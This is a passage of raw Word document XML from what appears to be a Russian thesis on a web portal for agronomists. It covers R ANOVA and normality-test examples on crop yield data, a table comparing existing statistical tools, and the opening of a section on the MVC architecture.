      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>результат проведения описательных статистик</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4E969A" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00C67F95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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8E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>shapiro.test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>crop.data$yield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>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13F48856" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C67F95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>результат проведения тест Шапиро-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Уилка</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="271EFE6C" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00C67F95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>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F2624A6" w:rsidR="0093378B" w:rsidRPr="00461F77" w:rsidRDefault="0093378B" w:rsidP="00461F77">
      <w:r>
        <w:lastRenderedPageBreak/>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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>one.way.fert</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>crop.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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sidR="008F392E">
        <w:t>14</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>one.way.fert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18865ECF" w14:textId="09BFFC08" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="00461F77">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>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6BD36345" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00461F77">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>результаты проведения однофакторного дисперсионного анализа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279430E6" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pP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lastRenderedPageBreak/>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13D82D9C" w:rsidR="0093378B" w:rsidRPr="007876D1" w:rsidRDefault="0093378B" w:rsidP="007876D1">
      <w:r>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4A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>two.way</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>aov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>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Pr="007876D1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Знак</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A1170">
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="004A1170">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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>two.way</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>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29A04EB6" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>результат выполнения двухфакторного дисперсионного анализа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F863C1" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C041264" w14:textId="5C624B2F"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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>hist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>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12F387CF" w14:textId="10D5DBF1" w:rsidR="00F73005" w:rsidRDefault="0093378B" w:rsidP="006E14B4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>16</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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>boxplot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>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5E15C00D" w14:textId="77635D53" w:rsidR="00F73005" w:rsidRDefault="0093378B" w:rsidP="006E14B4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>17</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4A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>aov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>three.way</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">yield ~ fertilizer + density + block, data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crop.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>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xml:space="preserve">» </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>и  «</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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1E3DBED6" w14:textId="35A0C59A" w:rsidR="00F73005" w:rsidRDefault="0093378B" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – результаты проведения многофакторного (трёхфакторного) дисперсионного анализа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C96934" w14:textId="77777777" w:rsidR="00295BB1" w:rsidRDefault="00295BB1" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pP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проведён успешно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EB8CF" w14:textId="04A25138" w:rsidR="008F392E" w:rsidRDefault="00A86ECB" w:rsidP="005A31AD">
      <w:r>
        <w:t xml:space="preserve">Таким образом агроном может исследовать влияние различных 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50B2586C" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="008778F0">
      <w:r>
        <w:t>Также стоит отметить, что основной мотивацией постановки задачи заказчиком на разработку веб-портала для агрономов является некоторые недостатки как статистических пакетов и «карт урожая». Эти проблемы рассмотрены в таблице 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F6FF59" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00823137" w:rsidRDefault="008778F0" w:rsidP="008778F0">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2028"/>
        <w:gridCol w:w="1202"/>
        <w:gridCol w:w="1441"/>
        <w:gridCol w:w="1566"/>
      </w:tblGrid>
      <w:tr w:rsidR="008778F0" w:rsidRPr="0066369B" w14:paraId="2638F166" w14:textId="77777777" w:rsidTr="0038557A">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="339"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1590" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72AEEA8C" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="0066369B" w:rsidRDefault="008778F0" w:rsidP="0038557A">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3B68E84F" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Доступность</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A4E475" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="0066369B" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>в России</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4ADD3A77" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="0066369B" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Кросс-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>платформенность</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1227" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2418B888" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Эргоно</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="636BEFF4" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="0066369B" w:rsidRDefault="008778F0" w:rsidP="0038557A">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3EE14679" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Веб-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="635959D6" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>интерфейс</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75D84453" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Интеграция</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04C21F57" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="004A2370" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>с</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> IOT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008778F0" w:rsidRPr="0066369B" w14:paraId="0D106CDA"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719190A5" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="0066369B" w:rsidRDefault="008778F0" w:rsidP="0038557A">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78670BCA" w14:textId="00284144" w:rsidR="008778F0" w:rsidRPr="000C7560" w:rsidRDefault="003A41B1" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>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43C3C58"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E3CE77"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F74848B"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40DB61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EA25DD2"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4A2C9367" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="008809B0" w:rsidRDefault="008778F0" w:rsidP="0038557A">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2B1FB6B4"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AB0DA86"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6DBC3D4A"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9882E66" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00EB37C5" w:rsidRDefault="008778F0" w:rsidP="0038557A">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868FC43"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CE11504"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15F62612" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="008809B0" w:rsidRDefault="008778F0" w:rsidP="0038557A">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1F1F3FC8"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CDE9AD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52E648D9"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7858F83"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9DF76E6"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1FFB76C3"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1F034E3" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="008809B0" w:rsidRDefault="008778F0" w:rsidP="0038557A">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3729BAA9"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6EAC93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83581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7AD0272"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34382B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489F252"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0D07D21D" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="008809B0" w:rsidRDefault="008778F0" w:rsidP="0038557A">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001449A7"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255A381A"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11270C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220E9DD7"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5CA14BA"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7EE56566"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B2209F5" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="008809B0" w:rsidRDefault="008778F0" w:rsidP="0038557A">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73E4D17F" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00EB37C5" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB37C5">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C45D8A5"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E94EDD0"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273FD10"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6C000A4" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00EB37C5" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB37C5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B3C1FD8" w14:textId="77777777" w:rsidR="008F392E" w:rsidRDefault="008F392E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5367561F" w14:textId="18C75B5E" w:rsidR="0093378B" w:rsidRPr="00B45074" w:rsidRDefault="0093378B" w:rsidP="00584880">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc122277550"/>
      <w:bookmarkStart w:id="31" w:name="_Toc161568211"/>
      <w:bookmarkStart w:id="32" w:name="_Toc162709237"/>
      <w:r w:rsidRPr="00541C36">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidRPr="00541C36">
        <w:t>Выбор технологий для решения задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="7A6D7A09" w14:textId="5CC3EFFF" w:rsidR="0093378B" w:rsidRPr="00F73005" w:rsidRDefault="0093378B" w:rsidP="00AC25AD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc161568212"/>
      <w:bookmarkStart w:id="34" w:name="_Toc162709238"/>
      <w:r w:rsidRPr="00F73005">
        <w:t>3.1 Технология программирования веб</w:t>
      </w:r>
      <w:r w:rsidR="00D51198" w:rsidRPr="00F73005">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73005">
        <w:t>сервера и графического пользовательского интерфейса</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="54EFA926" w14:textId="63AA45E3"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00E258B2" w:rsidRPr="00E258B2">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>1</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00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>], где он был задуман</w:t>
      </w:r>
      <w:r w:rsidR="00D51198">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как способ организации ряда ранних приложений с графическим пользовательским интерфейсом,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00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>3</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 xml:space="preserve">Каждая порция архитектуры MVC четко определена и самодостаточна: такое положение вещей называют разделением обязанностей. Логика, которая </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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37A09F36"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 xml:space="preserve">представлен на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1DA4B8" w14:textId="7C61A534" w:rsidR="0093378B" w:rsidRDefault="001F2D74" w:rsidP="005924E5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>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41CECEAA" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="001F2D74">
        <w:t xml:space="preserve">Принцип работы архитектурного паттерна </w:t>
      </w:r>
      <w:r w:rsidR="001F2D74">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DB2F11" w14:textId="77777777" w:rsidR="00F73005" w:rsidRPr="001F2D74" w:rsidRDefault="00F73005" w:rsidP="005924E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pP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w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Контроллеры определяют действия, предоставляющие бизнес-логику, которая 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144E4A6E"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00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>4</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00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>5</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r w:rsidRPr="00837F65">
        <w:t>паттернов</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
